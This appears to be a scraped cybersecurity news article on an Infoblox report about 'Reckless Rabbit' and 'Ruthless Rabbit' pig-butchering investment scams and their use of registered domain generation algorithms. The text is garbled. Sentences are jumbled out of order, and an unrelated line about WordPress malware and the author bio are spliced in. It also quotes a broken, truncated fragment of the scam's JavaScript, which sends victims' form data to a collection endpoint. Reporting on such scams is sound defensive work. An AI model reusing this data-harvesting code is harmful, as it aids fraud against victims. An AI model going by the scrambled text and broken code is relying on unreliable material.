These sophisticated scams, which include the notorious “pig butchering” schemes, deploy various attack vectors ranging from generic text messages to targeted social media advertisements, often using fake cryptocurrency platforms to defraud victims. The researchers documented how these actors employ registered domain generation algorithms (RDGAs) to create thousands of domains programmatically, allowing them to rapidly replace domains that get flagged or taken down by security systems. $('form').submit(function (event){ $(this).submit(false); event.preventDefault(); event.stopPropagation(); if($('.iti__selected-dial-code').length){ var prefix = $('.iti__selected-dial-code').html().slice(1) $(this).append(` `) } var host = `&host=${$(location).attr('hostname')} var url=`&url=${$(location).attr('href')} var args = host + url + so $.ajax({ type: "POST", url: ' ;.]tech/api/v1/submit/a6111ace-7304-4d9b-8dfe-9aafb7e9638e/', data: $(this).serialize() + args, success: function (response) { if (response. Infoblox researchers identified two prominent threat actor groups-dubbed “Reckless Rabbit” and “Ruthless Rabbit”-who have developed distinctive techniques for operating these scams at scale. Many utilize sophisticated traffic distribution systems (TDS) that filter and redirect visitors based on their geolocation, potentially steering security researchers away from malicious content. “Unlike traditional domain generation algorithms associated with malware, these RDGAs are a secret kept by the actor, who registers all the domain names,” explained the Infoblox threat intelligence team in their report. The scammers operate by creating convincing fake investment platforms, commonly referred to as “profit platforms,” designed to appear legitimate while harvesting personal and financial information from unsuspecting users. This code reveals how the actors implement validation checks to filter out security researchers and ensure only viable targets proceed through the scam funnel. Investment scams have emerged as the most costly form of fraud facing consumers, with the Federal Trade Commission reporting that victims lost a staggering US $5.7 billion in 2024 alone-a 24 percent increase from the previous year. Infoblox researchers noted that over 3 million RDGA domains have been observed on the internet, with many being used for investment scams. As investment scams continue to grow in both number and sophistication, understanding the DNS techniques employed by these threat actors becomes increasingly crucial for effective cybersecurity defenses. A sophisticated malware variant masquerading as a legitimate WordPress security plugin has been identified, capable of providing attackers with persistent access to compromised websites. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. This technique creates significant noise in DNS traffic, making it challenging for security tools to identify and block the actual malicious domains. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. These platforms typically feature embedded web forms that collect names, email addresses, and phone numbers, which are then used to progress victims through increasingly deceptive stages of the scam. The Reckless Rabbit actor, for instance, implements wildcard DNS responses to their domains, meaning any subdomain query (randomsubdomain.scamdomain.info) will return a valid response.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 01 May 2025 15:30:05 +0000